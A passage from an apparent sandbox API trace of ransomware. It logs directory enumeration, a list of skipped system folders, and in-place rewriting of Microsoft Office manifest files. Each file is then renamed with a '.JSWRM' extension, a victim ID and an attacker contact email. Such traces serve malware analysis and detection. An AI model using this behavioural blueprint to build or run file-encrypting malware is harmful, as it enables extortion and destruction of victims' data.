lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0102.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0102.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0102.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.129] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd362c40f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd362c40f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd37374c5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.publishermui.msi.16.en-us.xml", cAlternateFileName="C26B0A~1.XML")) returned 1 [0102.129] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2=".") returned 1 [0102.129] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="..") returned 1 [0102.129] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="...") returned 1 [0102.130] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="windows") returned -1 [0102.130] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0102.130] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0102.130] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0102.130] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.130] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0102.130] lstrcmpiW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0102.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0102.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.publishermui.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0102.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.publishermui.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.publishermui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 41 [0102.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0102.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0102.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.publishermui.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0102.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.publishermui.msi.16.en-us.xml", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.publishermui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 41 [0102.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0102.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0102.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0102.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0102.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publishermui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.131] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=14132) returned 1 [0102.131] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3730) returned 0x24c1d0 [0102.131] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3730, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x3730, lpOverlapped=0x0) returned 1 [0102.133] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.133] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3730, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x3730, lpOverlapped=0x0) returned 1 [0102.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.134] CloseHandle (hObject=0x45c) returned 1 [0102.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0102.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0102.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0102.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0102.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0102.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0102.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publishermui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.publishermui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.publishermui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0102.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0102.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0102.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.135] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd28c2fa3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd28c2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd29ce0e8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb27ee, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cAlternateFileName="C2A7B5~1.XML")) returned 1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0102.135] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0102.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0102.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0102.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 50 [0102.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0102.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0102.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0102.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 50 [0102.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0102.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0102.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0102.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0102.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.136] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=731118) returned 1 [0102.136] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.136] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.149] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.149] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.150] CloseHandle (hObject=0x45c) returned 1 [0102.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0102.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0102.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0102.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0102.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0102.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0102.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0102.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0102.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0102.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.151] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1159842, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1159842, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x11cbd0e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2aafe, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", cAlternateFileName="C2668D~1.XML")) returned 1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0102.151] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0102.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0102.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0102.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x20d920, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 48 [0102.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0102.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0102.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0102.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 48 [0102.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0102.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0102.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0102.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0102.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.153] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=174846) returned 1 [0102.153] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0102.153] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0102.165] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.165] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0102.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.165] CloseHandle (hObject=0x45c) returned 1 [0102.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0102.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.166] HeapFree (in: 